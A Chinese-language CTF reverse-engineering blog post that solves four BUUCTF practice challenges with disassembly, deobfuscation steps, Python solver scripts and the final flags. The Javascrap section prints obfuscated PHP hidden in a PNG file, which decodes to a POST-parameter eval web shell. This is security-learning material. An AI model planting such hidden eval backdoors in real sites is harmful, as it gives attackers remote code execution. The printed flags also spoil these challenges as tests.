REVERSE-PRACTICE-BUUCTF-25
特殊的 BASE64
exe程序,运行后输入,无壳,ida分析
main函数,读取输入,进行变表base64编码,与rightFlag比较验证
在字符串窗口找到变表
用工具解base64即可得到flag
[FlareOn1]Javascrap
html文件什么都得不到
用010 editor打开那个png文件,在文件最后隐写了php代码
<?php
$terms=array("M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", ">", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|");
$order=array(59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 17, 37, 63, 58, 37, 91, 63, 83, 43, 87, 42, 24, 60, 87, 93, 18, 87, 66, 28, 48, 19, 66, 63, 50, 37, 91, 63, 17, 1, 87, 93, 18, 45, 66, 28, 48, 19, 40, 11, 25, 5, 70, 63, 7, 37, 91, 63, 12, 1, 87, 93, 18, 81, 37, 28, 48, 19, 12, 63, 25, 37, 91, 63, 83, 63, 87, 93, 18, 87, 23, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91, 63, 18, 50, 87, 42, 18, 90, 87, 93, 18, 81, 40, 28, 48, 19, 40, 11, 7, 5, 70, 63, 7, 37, 91, 63, 12, 68, 87, 93, 18, 81, 7, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 18, 17, 37, 0, 50, 5, 40, 42, 50, 5, 49, 42, 25, 5, 91, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 93, 18, 1, 17, 80, 58, 66, 3, 86, 27, 88, 77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 70, 63, 7, 5, 66, 42, 25, 37, 91, 0, 12, 50, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 48, 19, 7, 63, 50, 5, 37, 0, 24, 1, 87, 0, 24, 72, 66, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 1, 87, 93, 18, 11, 66, 28, 18, 87, 70, 28, 48, 19, 7, 63, 50, 5, 37, 0, 18, 1, 87, 42, 24, 60, 87, 0, 24, 17, 91, 28, 18, 75, 49, 28, 18, 45, 12, 28, 48, 19, 40, 0, 7, 5, 37, 0, 24, 90, 87, 93, 18, 81, 37, 28, 48, 19, 49, 0, 50, 5, 40, 63, 25, 5, 91, 63, 50, 5, 37, 0, 18, 68, 87, 93, 18, 1, 18, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 90, 87, 0, 24, 72, 37, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 48, 19, 40, 90, 25, 37, 91, 63, 18, 90, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 75, 70, 28, 48, 19, 40, 90, 58, 37, 91, 63, 75, 11, 79, 28, 27, 75, 3, 42, 23, 88, 30, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 23, 75, 77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 37, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47);
$do_me="";
for($i=0;$i<count($order);$i++)
{$do_me=$do_me.$terms[$order[$i]];}
eval($do_me);
?>
把最后的eval改成echo,找个php在线工具执行一下,打印
$_=\'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9\';
$__=\'JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7\';
$___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
eval($___($__));
将第一个字符串$_解base64
将\97\49\x31开始的数据抠出来,转成字符串,做点简单变换即为flag
data=[97,49,0x31,68,0x4f,0x54,116,104,0x61,116,0x44,79,0x54,106,97,118,97,53,0x63,
114,0x61,0x70,65,84,102,0x6c,0x61,114,101,0x44,65,0x53,72,111,0x6e,0x44,0x4f,
84,99,0x6f,0x6d]
print(''.join(chr(i) for i in data))
# a11DOTthatDOTjava5crapATflareDASHonDOTcom
# a11.that.java5crap@flare-on.com
[WMCTF2020]easy_re
exe程序,perl语言写的,ida看不出什么东西
上x64dbg,F8单步调试,运行到这里时可以看到代码
(直接搜索字符串"script",可以找到解压call,下断后F9,也可看到代码)
将输入与已定义的flag比较,直接交flag即可
$flag = \"WMCTF{{I_WAnt_dynam1c_F1ag}}\";
print \"please input the flag:\";
$line = <STDIN>;
chomp($line);
if($line eq $flag)
{{print \"congratulation!\"}}
else
{{print \"no,wrong\"}}
[NPUCTF2020]BasicASM
汇编代码,主要的逻辑为
读取输入,输入的下标为奇数时,输入的内容异或0x42,下标为偶数时不变
将变换后的输入转成十六进制输出
00007FF7A8AC5A92 lea rcx,[flag]
00007FF7A8AC5A96 call std::basic_string<char,std::char_traits<char>,std::allocator<char> >::basic_string<char,std::char_traits<char>,std::allocator<char> > (07FF7A8AC15E1h)
00007FF7A8AC5A9B nop
00007FF7A8AC5A9C mov dword ptr [p],0 //[p]==0
00007FF7A8AC5AA3 mov dword ptr [rbp+64h],0 //[rbp+64h]==0
00007FF7A8AC5AAA jmp main+64h (07FF7A8AC5AB4h)
00007FF7A8AC5AAC mov eax,dword ptr [rbp+64h]
00007FF7A8AC5AAF inc eax
00007FF7A8AC5AB1 mov dword ptr [rbp+64h],eax //[rbp+64h]==1
00007FF7A8AC5AB4 movsxd rax,dword ptr [rbp+64h]
00007FF7A8AC5AB8 mov qword ptr [rbp+1F8h],rax //[rbp+1F8h]==1
00007FF7A8AC5ABF lea rcx,[flag]
00007FF7A8AC5AC3 call std::basic_string<char,std::char_traits<char>,std::allocator<char> >::length (07FF7A8AC122Bh)
00007FF7A8AC5AC8 mov rcx,qword ptr [rbp+1F8h] //rcx==1
00007FF7A8AC5ACF cmp rcx,rax //rax==length(input)
00007FF7A8AC5AD2 jae main+1B2h (07FF7A8AC5C02h)
00007FF7A8AC5AD8 mov eax,dword ptr [rbp+64h] //eax==[rbp+64h]==1
00007FF7A8AC5ADB and eax,1 //eax&1
00007FF7A8AC5ADE cmp eax,1 //判断是否为奇数
00007FF7A8AC5AE1 jne main+126h (07FF7A8AC5B76h)
00007FF7A8AC5AE7 movsxd rax,dword ptr [rbp+64h] //rax==[rbp+64h]==1
00007FF7A8AC5AEB mov rdx,rax
00007FF7A8AC5AEE lea rcx,[flag]
00007FF7A8AC5AF2 call std::basic_string<char,std::char_traits<char>,std::allocator<char> >::operator[] (07FF7A8AC1442h)
00007FF7A8AC5AF7 movsx eax,byte ptr [rax] //eax==input[1]
00007FF7A8AC5AFA xor eax,42h //eas^0x42
00007FF7A8AC5AFD mov dword ptr [p],eax //[p]==eax
00007FF7A8AC5B00 mov dl,30h
00007FF7A8AC5B02 lea rcx,[rbp+144h]
00007FF7A8AC5B09 call std::setfill<char> (07FF7A8AC1046h)
00007FF7A8AC5B0E mov qword ptr [rbp+1F8h],rax
00007FF7A8AC5B15 mov edx,2
00007FF7A8AC5B1A lea rcx,[rbp+168h]
00007FF7A8AC5B21 call std::setw (07FF7A8AC10D2h)
00007FF7A8AC5B26 mov qword ptr [rbp+200h],rax
00007FF7A8AC5B2D lea rdx,[std::hex (07FF7A8AC1488h)]//十六进制
00007FF7A8AC5B34 mov rcx,qword ptr [__imp_std::cout (07FF7A8AD71C0h)]
00007FF7A8AC5B3B call qword ptr [__imp_std::basic_ostream<char,std::char_traits<char> >::operator<< (07FF7A8AD7160h)] //输出
由输出的十六进制字串写脚本即可得到flag
res="662e61257b26301d7972751d6b2c6f355f3a38742d74341d61776d7d7d"
data=[]
for i in range(0,len(res),2):
data.append(int('0x'+res[i:i+2],16))
for i in range(1,len(data),2):
data[i]^=0x42
print(''.join(chr(i) for i in data))
#flag{d0_y0u_know_x86-64_a5m?}
492
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
